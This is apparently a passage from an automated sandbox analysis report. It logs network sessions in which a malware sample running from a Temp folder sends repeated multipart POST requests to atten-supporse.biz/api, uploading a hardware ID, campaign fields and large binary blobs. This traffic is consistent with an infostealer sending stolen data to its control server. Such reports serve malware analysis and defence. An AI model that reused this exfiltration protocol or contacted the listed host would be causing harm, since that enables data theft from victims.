                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=u8um49p9nt9dj5fbo84inkvvu9; expires=Fri, 04-Apr-2025 13:56:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sap2est81NzEm89D1QsoEfUjmzkMVMPfzUS8dsgq%2F22G%2FeFMArD8pwrlq4YUiNMfD4R2epe60IPbZ8MwE8%2BiWcZjYlWY9B433Kda0zVp3qoopfyDo5bmb6m3FQ73JegmkASLXRI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a2b9db027ced-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2290&min_rtt=1807&rtt_var=1645&sent=12&recv=18&lost=0&retrans=0&sent_bytes=2847&recv_bytes=16060&delivery_rate=514446&cwnd=179&unsent_bytes=0&cid=36206db3168d2f4c&ts=1014&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            20192.168.2.650013104.21.48.14433504C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:59 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4QTYFXZA02DFZLBVCPO
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 19975
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:59 UTC15331OUTData Raw: 2d 2d 34 51 54 59 46 58 5a 41 30 32 44 46 5a 4c 42 56 43 50 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 34 51 54 59 46 58 5a 41 30 32 44 46 5a 4c 42 56 43 50 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 51 54 59 46 58 5a 41 30 32 44 46 5a 4c 42 56 43 50 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                            Data Ascii: --4QTYFXZA02DFZLBVCPOContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--4QTYFXZA02DFZLBVCPOContent-Disposition: form-data; name="pid"3--4QTYFXZA02DFZLBVCPOContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                                            2024-12-09 20:09:59 UTC4644OUTData Raw: a5 31 16 55 bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee
                                                                                                                                                                                                                                            Data Ascii: 1U2+?2+?2+?o?Mp5
                                                                                                                                                                                                                                            2024-12-09 20:09:59 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:59 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=r90ch6inu9hug0elir808tq7l8; expires=Fri, 04-Apr-2025 13:56:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U7brIt0H4vpuwKuwU6CAYbf4I8%2FoQXtEDDJIhWJTXY5tURIf53sAnWDaUZUUbR%2FMuKydhRimmq2KC4RJlzcf9wYXmKj%2BhHtLWHIIKkfFuAvEOJOZoRjafIY%2FGycCKKKbegyea80%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a2d0ea9e7ca5-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=1832&rtt_var=834&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20940&delivery_rate=1593886&cwnd=243&unsent_bytes=0&cid=c11cdc1b49799019&ts=946&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            21192.168.2.650033104.21.48.14433504C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:10:04 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=29R4YMEAS
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1216
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:10:04 UTC1216OUTData Raw: 2d 2d 32 39 52 34 59 4d 45 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 32 39 52 34 59 4d 45 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 39 52 34 59 4d 45 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 32 39 52 34 59 4d 45 41 53 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                                                            Data Ascii: --29R4YMEASContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--29R4YMEASContent-Disposition: form-data; name="pid"1--29R4YMEASContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--29R4YMEASConten
                                                                                                                                                                                                                                            2024-12-09 20:10:04 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:04 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ir8psok18hrnf01fphqs3k0ued; expires=Fri, 04-Apr-2025 13:56:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WXxv68ldfrG4DjVUmyKKmmACSZ6Ce11jMSXuVxHTTPZ4HwU0BV8YH8WKwfrlzmxx0YiSJ0FyChWIIAeCM2RWXvqT9yA%2Btay7u%2B9g5lTsT4DXmvjFK9OgWi%2BG5vscaBVOswWKR7E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a2f1886c0cc8-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1521&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2126&delivery_rate=1919789&cwnd=225&unsent_bytes=0&cid=2e148d55c241b1d6&ts=791&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:10:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:10:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            22192.168.2.650041104.21.48.1443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=L2FES8VDYL8VRTM4J
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 559720
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: 2d 2d 4c 32 46 45 53 38 56 44 59 4c 38 56 52 54 4d 34 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4c 32 46 45 53 38 56 44 59 4c 38 56 52 54 4d 34 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 32 46 45 53 38 56 44 59 4c 38 56 52 54 4d 34 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                                                                                            Data Ascii: --L2FES8VDYL8VRTM4JContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--L2FES8VDYL8VRTM4JContent-Disposition: form-data; name="pid"1--L2FES8VDYL8VRTM4JContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: 53 d7 a6 8f b8 22 1a be 09 27 ea 6f 67 cd e0 67 22 43 12 7d 51 dd d7 6f 12 53 82 41 60 f7 b7 46 6b 75 16 a9 ef 81 6b b8 71 ad b1 c2 9a 62 af 74 fc 95 4e 2b 74 89 ce 77 9a fa f4 a2 8a cc eb 1d 04 4f cb d1 ba c4 d6 1d 63 41 8f 2a df a2 21 94 28 99 5e 5e 99 f4 d0 ce 66 ec 45 5c 25 61 1d 9a 7d b1 69 65 03 23 55 15 b4 8e 26 e0 5c 55 ad 55 3e e7 6d 86 16 e5 46 b4 d4 ad e7 4b 82 4f 92 32 13 91 8f 3d f1 b7 77 59 2b de 67 ab 4a 79 b5 ff 72 ce 11 60 e1 78 b8 e9 c9 ce 3a b9 b0 74 b7 a9 42 4d 7b 5f c4 e1 da 0f 0f 9d d0 71 3e 0a ef 0f 5a a6 c6 44 46 c7 82 1d 1b 26 ba 66 a7 ad 52 83 fc 42 d3 f5 b7 b2 b6 db a4 c2 08 84 e5 10 55 8c 80 eb 33 ad b6 d6 4d 15 18 39 d9 e1 aa 26 e2 78 3c 09 f0 63 e0 d8 d9 86 ff 4c 24 76 89 8f 8f 94 de a4 6b d4 d3 8c 54 8f a3 92 f3 7e 69 3c b0
                                                                                                                                                                                                                                            Data Ascii: S"'ogg"C}QoSA`FkukqbtN+twOcA*!(^^fE\%a}ie#U&\UU>mFKO2=wY+gJyr`x:tBM{_q>ZDF&fRBU3M9&x<cL$vkT~i<
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: 52 f4 25 47 48 0b 6e f9 0b 29 b9 49 30 01 10 da 7a fc 9e 3d 3e 46 ce 3a 17 ec 7f 68 47 57 61 5c 6d f7 9a 19 2e 73 37 51 6e e9 d2 7e 4a ec 51 6c b4 eb fe 6d 60 79 c1 3f cd 77 f5 c9 13 df 7a 60 f7 ac ae 2d 1b 3a 2c 7e 20 5e 41 4b 2d 86 89 67 cd c6 9a 0a e1 f8 22 03 4e 40 93 0c 6b d5 70 62 e2 a2 5f 6f 0a 1f 60 5f 10 db fa b1 a1 69 f7 17 1c cd c1 c0 45 47 5e 17 6f 65 46 87 45 0f 1d e9 b7 f3 1c 55 1f 14 d1 19 20 70 cd 36 f9 d2 cf 8f 35 c8 a3 6f 7f 4e f5 2f 5d b2 b2 9b 3b 54 c2 44 f8 b7 ea 4d 94 78 a4 07 bd eb e7 7c 8f 1e 88 3e 3c 89 f5 1d e2 36 86 e3 90 2b 31 87 47 bf 4a b1 cf b9 c1 01 73 08 d8 92 b3 55 3c d8 b3 40 6b ae e4 1d 06 cc b6 81 07 d5 e5 f5 75 44 5e 52 bb 6b 4f c9 48 cf 47 5f 87 12 e7 c2 f2 eb 23 72 ac ad 7f dd 65 36 c6 b7 fc 4d 5f 5b 41 c3 b4 2a f6
                                                                                                                                                                                                                                            Data Ascii: R%GHn)I0z=>F:hGWa\m.s7Qn~JQlm`y?wz`-:,~ ^AK-g"N@kpb_o`_iEG^oeFEU p65oN/];TDMx|><6+1GJsU<@kuD^RkOHG_#re6M_[A*
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: f6 76 dd 66 9f e4 1c c2 f8 3f 54 5f e3 22 99 09 8a 20 e1 a4 27 31 38 56 54 09 df 8a 6f 7c 88 82 2b 63 31 b6 d2 81 d2 e8 d7 8a dd d5 ac b8 52 77 24 53 2e 41 31 c1 ce 1e 84 f6 9b ec ff 8c 64 be c2 d2 57 ec e9 42 7c 0a 02 b9 79 44 5d b4 48 e7 1b 6f 4e 4a 59 90 08 d4 b4 59 92 54 c7 03 86 8d fe ae 3f d4 a8 0a 63 3c 7f 7b 5b 36 ff ac 91 e2 37 0e 80 2b 2f d4 a4 23 95 87 69 a7 0c b5 11 66 d2 9a 84 68 6f 75 86 d9 3e f3 89 68 45 a3 97 2d 3b db 93 55 07 c2 37 0c 53 96 8b 38 d0 41 29 16 35 92 3c a3 71 04 26 72 f8 ef d2 6f a1 a6 12 71 dc 39 90 bd 20 b8 49 db 75 94 93 a2 dd ac 37 5a 36 9e c4 c0 f8 97 d5 da 97 43 da c3 bc 6f 61 5d 5f 7d b6 31 13 c2 1a 65 94 42 39 4a 05 ca b2 71 e5 61 df 64 1f 2e 1d e1 65 17 64 69 5e bb b5 71 51 02 48 8f 51 4a 85 64 ad 12 fa 6f 5e b0 51
                                                                                                                                                                                                                                            Data Ascii: vf?T_" '18VTo|+c1Rw$S.A1dWB|yD]HoNJYYT?c<{[67+/#ifhou>hE-;U7S8A)5<q&roq9 Iu7Z6Coa]_}1eB9Jqad.edi^qQHQJdo^Q
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: 4d fd 59 7f 39 79 e9 6b 5c 7f df 17 da c5 33 76 f4 aa 97 e6 58 18 4e 0f 16 fd c3 f3 30 84 77 2c f9 4f 66 1b 94 01 b0 63 23 b3 1f a9 4e ea 57 5c cb 79 83 ef 3e db 9d 65 41 b5 42 fc be c5 45 d3 8e 03 72 d7 35 40 a3 01 98 f9 88 1a 75 85 e0 c7 51 41 29 bd 5f 23 03 f3 bc 42 29 15 09 e1 49 11 1c ab 24 69 ef d7 f6 38 e6 54 d5 fc 40 ee a9 2b eb f2 8e 0a 1f 09 e3 01 3e 43 c9 e9 2c 97 43 37 ad 45 7f a9 3c 97 13 3f 93 b5 90 2f f3 39 47 ea ff b5 b8 43 34 1b 23 ea 2b 08 94 22 c2 fe 37 db 31 80 31 c4 3a fc 8e 33 b8 3a e9 0f c2 7e 74 46 49 c0 28 f8 f3 14 b3 da 46 ba 0c 0b 1a ee 19 1d 16 e8 57 02 ee 5a 48 2b 11 64 98 3a ad 2b 4f a7 6c f0 6d 40 fd ac 19 c9 b1 6e b5 ab 1b 03 50 4d 7f ba 39 e0 b3 62 ab df 9d 38 bf e1 bc ab ec ef 3d 03 cd 20 31 da 46 7f 33 a1 7f 5c 91 3a fd
                                                                                                                                                                                                                                            Data Ascii: MY9yk\3vXN0w,Ofc#NW\y>eABEr5@uQA)_#B)I$i8T@+>C,C7E<?/9GC4#+"711:3:~tFI(FWZH+d:+Olm@nPM9b8= 1F3\:
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: c0 98 33 35 48 08 29 00 da 1a e1 44 12 88 09 c8 af 00 c3 8c 11 47 32 36 61 83 8f ea 07 df fc 95 d0 39 25 06 52 f4 ba 74 80 08 43 08 cc 69 5d 95 a3 a8 2d 5f fd 84 91 a9 5e 78 9c 30 ec a8 c5 49 c4 85 04 3a 71 f7 2f 15 68 1c 64 d3 25 48 f2 af be 70 09 73 65 39 5e 09 a5 51 97 22 e2 af 0d 07 09 96 8f df 39 a9 16 9b 65 3d 36 df 74 14 4c b8 40 17 c6 5e 93 af ad d9 ed 14 00 b6 ff 2b 96 cf 0b fc 78 a0 44 2e a0 bd 43 f2 3a e8 56 c1 ce 88 02 e3 37 c8 82 73 fb 21 b8 71 50 02 d0 a8 1d ad 47 fb 42 fb 1e c3 c5 b6 d6 e3 a4 3f ca c4 67 93 59 16 84 fa 90 12 86 22 66 eb 35 ba 2c f4 e2 ed 2f cc f2 94 02 ae 8e 83 21 7b f4 47 d2 fe 56 9d 8d 8d c9 1f f8 13 92 ca 9b 2d 40 c4 ac 07 2f 73 1e 97 e0 d1 14 ca ec 09 22 60 e3 11 04 15 44 e6 48 be f9 00 a0 be dc 81 f3 dd ea d1 2e 40 10
                                                                                                                                                                                                                                            Data Ascii: 35H)DG26a9%RtCi]-_^x0I:q/hd%Hpse9^Q"9e=6tL@^+xD.C:V7s!qPGB?gY"f5,/!{GV-@/s"`DH.@
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: a4 ce 8f e6 fe ab 88 e4 0b 72 5c bb 64 4c fd 27 01 65 cc 41 ab ed dc 7e 36 7d fb 6b 55 54 7c 94 10 4f 43 61 d7 94 a3 b6 ed db 3c 4a 3a 3e 63 b8 e3 8c fb bd 78 ef 70 db 9f 08 6c bc ee f5 ae 72 0d e9 af 6f dc bf 00 4e 21 95 b3 57 00 a8 54 3e 3e e3 4f d9 b7 39 6a c6 63 0a 11 00 6a 1f 9d e0 3d 7d 67 f7 1f 97 a7 d7 4f 7e 4b 13 d9 d2 1c fe 71 76 d1 40 0e d0 fa c3 e3 6d 0e 81 6c cc 7f 7b 2f 5a 24 01 63 70 90 dc 77 f4 09 ad 14 1d 46 3a f2 65 91 7c 76 7d b0 aa e6 21 0c 3f c1 fd d2 7b 17 66 36 7c 48 a4 43 00 b6 65 61 65 b7 a3 b0 7e f7 82 f1 3e 5c fc 21 dc 14 0a d3 5a b9 28 f2 5c 0f cc e9 c3 5d fe ef 75 c8 ff fe c9 2f 3c 05 5b ca db 3d 57 98 e9 d4 d1 92 19 9c ef 2c 68 62 e7 51 54 ba 39 2f 40 46 bb 34 38 c4 5f ff 1d 55 70 9d 4c fb 09 d8 8c 31 ab 58 8d e6 3f 5a db 27
                                                                                                                                                                                                                                            Data Ascii: r\dL'eA~6}kUT|OCa<J:>cxplroN!WT>>O9jcj=}gO~Kqv@ml{/Z$cpwF:e|v}!?{f6|HCeae~>\!Z(\]u/<[=W,hbQT9/@F48_UpL1X?Z'
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: ea de 42 16 98 45 27 6e fd 39 08 09 21 63 35 58 1d 68 26 73 d4 c4 df 02 01 9a bc 70 60 e2 32 fe 32 1f a5 57 c1 e0 87 46 ed 30 ad 53 a5 c6 70 c4 ae 14 88 e0 87 66 08 9b 5e c2 3e a6 23 21 9c 17 6a 3f 48 39 1a de cb b1 6b 2d bc 4d 9a dd 72 94 b1 a5 db 08 e0 d3 c8 9b 5f a7 5b 9c 68 15 bc 57 3a 59 e2 4c cf 83 c4 01 ec 2f ba 78 a1 72 7a 7c 74 36 bb 90 b5 6c d6 fc ab 10 5f 5a 3c d5 08 27 3a c3 1f fd de a0 98 bd 03 d3 da 1d cd 1c 90 5c e6 1b b7 0e b8 d9 70 49 43 44 f8 65 3c 3f b9 fb 9b 9b 08 e0 d8 e1 4f 5e cb 20 27 01 35 1b 51 74 90 00 37 4f 45 3a 77 d8 7c 15 6d e5 33 3e b4 de 3d 1f e7 88 e9 29 0f 49 a7 98 fc 3f fb e3 8c b0 19 b4 f4 83 44 eb 98 4d 91 02 92 6f 89 f2 88 12 c0 5b e4 58 c7 f9 dd 4f 34 46 56 a1 17 0d ae e6 09 08 95 f3 56 cd 87 2f 27 9b 6b bc 56 2b fe
                                                                                                                                                                                                                                            Data Ascii: BE'n9!c5Xh&sp`22WF0Spf^>#!j?H9k-Mr_[hW:YL/xrz|t6l_Z<':\pICDe<?O^ '5Qt7OE:w|m3>=)I?DMo[XO4FVV/'kV+
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: 59 63 6b 39 0f c3 37 41 3a 8f d4 a0 e0 c9 cd 2f e2 52 fe a9 07 23 3f 98 c4 fb 0a ec f6 f2 86 5a eb 28 79 46 cd bf 5c dd da 49 4c 49 00 55 b0 fd de 22 60 98 0a 9c 4d 5c ad 36 31 c7 6a 9d de b7 ad 09 8a 70 04 6f 2b b5 f0 50 ed 8a 78 8d f8 fc 89 74 7b e0 b0 05 ff 9c 2a 0a c2 df a5 a6 1a 1c 1e ce b8 cd 38 19 9a 3d 3b 62 2c 66 eb a6 64 03 1c da 1a 30 06 3e 54 ae c5 cd 59 cb 58 42 ac 45 fe 65 64 e8 69 61 ce ce e5 03 da e7 9e 7a 23 17 1b 97 13 a7 fe 7b 48 4a 80 93 d7 4e f6 08 7b 23 88 16 6f 19 47 1d d2 a9 43 71 66 99 0c fb 54 7b fb ec 16 f6 51 90 77 04 fd 14 41 7b a7 85 10 28 cc ff 61 3d 12 61 78 e8 a1 07 e2 d7 ff 27 a4 d7 1b 95 75 b7 cf 15 e1 8b c6 51 91 b9 80 87 e0 3e 69 4a 67 0a 0a 72 c7 5d 06 06 c8 d8 8f af b5 c5 7a 14 88 a4 94 44 b8 4a 0d f1 07 03 89 5f 5d
                                                                                                                                                                                                                                            Data Ascii: Yck97A:/R#?Z(yF\ILIU"`M\61jpo+Pxt{*8=;b,fd0>TYXBEediaz#{HJN{#oGCqfT{QwA{(a=ax'uQ>iJgr]zDJ_]
                                                                                                                                                                                                                                            2024-12-09 20:10:06 UTC15331OUTData Raw: ac 56 4d 25 bc f0 66 a8 5d 47 f8 df 5a 01 03 2c bf 73 52 06 af 9e 49 31 49 c4 a0 20 28 02 85 98 e4 5a 85 08 4d 1e 24 54 f9 31 6c d3 7f 77 45 b0 6b dd 33 06 ec cf 7f 4f dc c5 3b 3d 94 a7 25 57 f6 23 06 5b f6 17 46 bb 7f e0 af 09 92 f8 40 cc 92 0d 6e a7 04 41 05 8f 27 e1 0b 86 31 3a 2d 50 46 5a 05 a7 1b d7 14 02 88 f9 db 4d be 98 65 c2 ef d9 e4 8b 01 f8 be b8 ed e7 10 0f 43 4c 56 64 c0 1b b0 da b1 92 8b 4b 8d a0 b7 15 cf 79 dc 9e eb fd a6 d7 85 59 65 5a dc b2 36 19 c3 4e 05 73 7a e4 48 b5 b4 96 e9 e2 df 55 02 39 07 32 cd f8 61 4e aa 30 88 20 cf cf a9 c2 51 c1 d0 9b ed a9 53 9f f6 a4 c3 58 fb 2f 31 b2 ec b9 7e c1 de 24 5b 7a d4 8e 64 cf f6 1b 83 ea fb a3 27 17 8b f7 68 f6 63 bf 29 88 9a ef e8 ca d2 5d d2 7e 22 94 77 58 00 2c 9a 06 62 15 fb db 77 e0 aa ce f6
                                                                                                                                                                                                                                            Data Ascii: VM%f]GZ,sRI1I (ZM$T1lwEk3O;=%W#[F@nA'1:-PFZMeCLVdKyYeZ6NszHU92aN0 QSX/1~$[zd'hc)]~"wX,bw
                                                                                                                                                                                                                                            2024-12-09 20:10:08 UTC1025INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:08 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=9ji9t8cqekv0q5jsv49kkbf46d; expires=Fri, 04-Apr-2025 13:56:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
